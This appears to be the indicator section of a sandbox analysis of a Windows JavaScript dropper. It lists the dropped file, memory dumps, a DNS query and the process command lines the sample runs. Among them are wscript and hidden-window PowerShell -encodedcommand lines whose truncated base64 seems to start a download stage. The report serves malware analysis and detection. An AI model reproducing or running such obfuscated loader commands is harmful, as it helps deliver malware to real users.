Technical Information
- %ALLUSERSPROFILE%\tubfishesslumped.js
- %TEMP%\content\4252-1796-wscript.exe-19-51-40-199.dump
- %TEMP%\content\2988-3196-wscript.exe-19-51-45-319.dump
- DNS ASK maps.windows.com
- '<SYSTEM32>\wscript.exe' "%ALLUSERSPROFILE%\TubfishesSlumped.js" Tinniness InartisticallyUnsynonymously Dartled EosideReasserted
- '<SYSTEM32>\wscript.exe' "%ALLUSERSPROFILE%\TubfishesSlumped.js" Tinniness InartisticallyUnsynonymously Dartled EosideReasserted' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encodedcommand "JABPAHgAeQBwAGUAdABhAGwAbwB1AHMAUwBlAG0AaQBkAGkAdgBpAHMAaQBvAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAHcAQQAzAEEAQwA0AEEATQBRAEEANQBBAEQA...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encodedcommand "JABPAHgAeQBwAGUAdABhAGwAbwB1AHMAUwBlAG0AaQBkAGkAdgBpAHMAaQBvAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAHcAQQAzAEEAQwA0AEEATQBRAEEANQBBAEQA...